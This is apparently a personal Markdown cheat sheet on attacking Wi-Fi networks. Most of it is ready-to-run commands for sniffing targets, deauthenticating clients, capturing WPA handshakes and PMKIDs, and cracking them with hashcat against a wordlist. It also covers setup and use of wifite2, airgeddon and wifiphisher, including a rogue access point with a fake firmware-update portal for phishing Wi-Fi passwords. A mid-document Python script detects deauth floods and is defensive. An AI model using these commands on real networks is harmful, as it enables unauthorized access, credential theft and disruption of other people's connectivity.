# Personal

## 4-Way Handshake

* <https://www.wifi-professionals.com/2019/01/4-way-handshake>
* <https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work>
* <https://www.aircrack-ng.org/doku.php?id=cracking_wpa>
* <https://security.stackexchange.com/questions/111527/no-handshake-recorded-from-airodump-ng>
* <https://hackware.ru/?p=74>
* <https://hackware.ru/?p=7542>
* <https://hackware.ru/?p=5209>

1\. Look for targets. Note the BSSID (`00:00:00:00:00:01`), CH (`9`), ESSID (`SomeEssid`) and STATION (`00:00:00:00:00:02`) in case a deauth is required later:

```
$ sudo airodump-ng -M -U wlan1 [-c 36-165 (for 5GHz, see WLAN channels) or just -c 1-200 for all] [--band <abg>]
```

2\. Start dumping the target's traffic:

```
[$ sudo iwconfig wlan1 channel 9]
$ sudo airodump-ng -c 9 --bssid 00:00:00:00:00:01 -w SomeEssid wlan1
```

3\. Send deauth packets in a separate terminal until `WPA handshake: XX:XX:XX:XX:XX:XX` appears (aggressive):

```
$ sudo aireplay-ng [-D] -0 2 -a 00:00:00:00:00:01 -c 00:00:00:00:00:02 wlan1
Or
$ for client in `cat 00:00:00:00:00:01.txt`; do sudo aireplay-ng -D -0 2 -a 00:00:00:00:00:01 -c $client wlan1; done
```

4\. Clean the capture, check it once again, convert it to Hashcat format and crack it:

```
$ aircrack-ng SomeEssid*.cap
$ wpaclean SomeEssid-cleaned.cap SomeEssid-01.cap
$ cowpatty -r SomeEssid-cleaned.cap -s SomeEssid -c
$ /usr/lib/hashcat-utils/cap2hccapx.bin SomeEssid-cleaned.cap SomeEssid.hccapx
$ hashcat -m 2500 -O -a 0 -w 3 --session=wpa2 -o wpa2.out wpa2.in SomeEssid.hccapx seclists/Passwords/darkc0de.txt
```
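From the defender's side, the deauthentication phase in step 3 is the loud part of this procedure: a burst of deauth/disassoc management frames carrying the AP's BSSID as transmitter, aimed at one client or at the broadcast address, shows up in any monitor-mode capture or WIDS feed. The Python script below is an added example, not code from this page or from the aircrack-ng project. It parses the raw 802.11 management header, keeps a per-BSSID sliding window of deauth/disassoc frames and raises an alert when the count within the window reaches a threshold. The MAC addresses, timestamps, sequence numbers and reason codes in the replayed trace are constructed for the demo, and the threshold and window are assumed tuning values, not vendor defaults.

```python
"""Detect 802.11 deauthentication / disassociation floods in a stream of raw frames."""
import struct
from collections import defaultdict, deque

# Frame Control field: bits 2-3 = type, bits 4-7 = subtype (type 0 = management)
TYPE_MGMT = 0
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_to_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def parse_frame(frame: bytes):
    """Parse the generic 802.11 MAC header.

    Layout: Frame Control (2) | Duration (2) | Addr1 (6) | Addr2 (6) | Addr3 (6) | Seq Ctrl (2) | body
    Returns a dict, or None when the frame is too short to hold a full header.
    """
    if len(frame) < 24:
        return None
    fc = frame[0]
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "addr1": mac_to_str(frame[4:10]),   # receiver
        "addr2": mac_to_str(frame[10:16]),  # transmitter
        "addr3": mac_to_str(frame[16:22]),  # BSSID for management frames
        "reason": None,
    }
    is_kick = info["type"] == TYPE_MGMT and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
    if is_kick and len(frame) >= 26:
        # Deauth/disassoc body starts with a little-endian 2-byte reason code
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


class DeauthFloodDetector:
    """Alert when `threshold` deauth/disassoc frames for one BSSID fall inside `window` seconds."""

    def __init__(self, threshold: int = 10, window: float = 1.0):
        self.threshold = threshold          # assumed tuning value
        self.window = window                # assumed tuning value, seconds
        self._recent = defaultdict(deque)   # bssid -> timestamps of recent kick frames
        self.alerts = []

    def feed(self, ts: float, frame: bytes):
        info = parse_frame(frame)
        if info is None or info["type"] != TYPE_MGMT:
            return None
        if info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        q = self._recent[info["addr3"]]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop timestamps that left the window
            q.popleft()
        if len(q) == self.threshold:            # fire once, when the burst first crosses the line
            alert = {
                "time": ts,
                "bssid": info["addr3"],
                "target": info["addr1"],
                "count": len(q),
                "reason": info["reason"],
                "broadcast": info["addr1"] == BROADCAST,
            }
            self.alerts.append(alert)
            return alert
        return None


def build_mgmt_frame(subtype: int, addr1: str, addr2: str, bssid: str, seq: int = 0, body: bytes = b"") -> bytes:
    """Build a minimal 802.11 management frame (constructed test input, no FCS)."""
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    duration = b"\x3a\x01"
    seq_ctrl = struct.pack("<H", (seq & 0xFFF) << 4)
    return fc + duration + mac_to_bytes(addr1) + mac_to_bytes(addr2) + mac_to_bytes(bssid) + seq_ctrl + body


def build_deauth(addr1: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Deauth frame from `bssid` to `addr1`; reason 7 = class 3 frame from non-associated STA."""
    return build_mgmt_frame(SUBTYPE_DEAUTH, addr1, bssid, bssid, seq, struct.pack("<H", reason))


def run_sample_trace(threshold: int = 10, window: float = 1.0):
    """Replay a constructed trace and return the alerts raised.

    Beacons and two well-separated deauths (normal idle/roaming) must stay silent;
    twenty deauths spoofed from the AP's BSSID within 0.2 s must raise one alert.
    """
    ap_a, ap_b, client = "00:00:00:00:00:01", "00:00:00:00:00:03", "00:00:00:00:00:02"
    det = DeauthFloodDetector(threshold, window)
    for i in range(20):                      # background beacons, ignored
        det.feed(i * 0.1, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, ap_a, ap_a, seq=i))
    det.feed(0.5, build_deauth(client, ap_b, reason=4, seq=1))   # reason 4: inactivity
    det.feed(5.0, build_deauth(client, ap_b, reason=4, seq=2))
    for i in range(20):                      # the burst
        det.feed(10.0 + i * 0.01, build_deauth(client, ap_a, reason=7, seq=100 + i))
    return det.alerts


if __name__ == "__main__":
    for a in run_sample_trace():
        print(a)
```

In a live deployment the frames would come from a monitor-mode interface or a pcap reader rather than `build_*`; the only fields the detector depends on are the frame-control byte, the three addresses and the reason code, so any 802.11 source that hands over the raw header works. A targeted burst with a single repeated reason code and the AP's own BSSID as transmitter, followed shortly by a fresh association and EAPOL exchange from the same client, is the pattern worth alerting on, since a genuine AP rarely kicks one station dozens of times per second.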

### wifite2

```
$ sudo wifite -vi wlan1 --clients-only --wpa --no-wps
```

## PMKID

* <https://habr.com/ru/company/jetinfosystems/blog/419383/>

### wifite2

```
$ sudo wifite -vi wlan1 --pmkid
```

## wifite2

* <https://github.com/derv82/wifite2>
* <https://github.com/nuncan/wifite2mod>

> «So the optimal algorithm for a hack… for an audit is as follows: determine whether WPS mode is enabled on the target access point. If so, run PixieDust. No luck? Then brute-force the known PINs. Still nothing? Check whether WEP encryption is enabled, which is also bypassed in no time. If not, run the PMKID attack against WPA(2). If even that fails, fall back to the classics and wait for a handshake (so as not to draw attention) or actively kick clients to catch their authentication sessions.» — [xakep.ru](https://xakep.ru/2020/01/27/wifi-total-pwn/)

Install wifite2:

```
$ git clone https://github.com/derv82/wifite2 ~/tools/wifite2 && cd ~/tools/wifite2
$ sudo python setup.py install
```

Install hcxdumptool (for capturing PMKID hashes):

```
$ git clone https://github.com/ZerBea/hcxdumptool.git ~/tools/hcxdumptool && cd ~/tools/hcxdumptool
$ sudo apt install libcurl4-openssl-dev libssl-dev -y
$ make
$ sudo make install
```

Install hcxtools (for converting PMKID packet captures into hashcat's format):

```
$ git clone https://github.com/ZerBea/hcxtools.git ~/tools/hcxtools && cd ~/tools/hcxtools
$ make
$ sudo make install
```

Fire up wifite2:

```
$ sudo wifite -vi wlan1 [--kill] [-5]
```

## airgeddon

* <https://github.com/v1s1t0r1sh3r3/airgeddon>

```
$ git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git ~/tools/airgeddon && cd ~/tools/airgeddon
$ sudo bash airgeddon.sh
```

## wifiphisher

* <https://github.com/wifiphisher/wifiphisher>
* [Creating a custom phishing scenario · wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher/blob/5ae21ab93e0dce85dd4bf76e68cc3b996aa33dea/docs/custom_phishing_scenario.rst)

Install:

```
$ git clone https://github.com/wifiphisher/wifiphisher.git ~/tools/wifiphisher && cd ~/tools/wifiphisher
$ sudo python3 setup.py install # Install any dependencies
```

Start a rogue AP with fake captive portal (firmware update scenario) on wlan1 and deauth clients with wlan2:

```
$ sudo wifiphisher -aI wlan1 -eI wlan2 -p wifi_connect
```
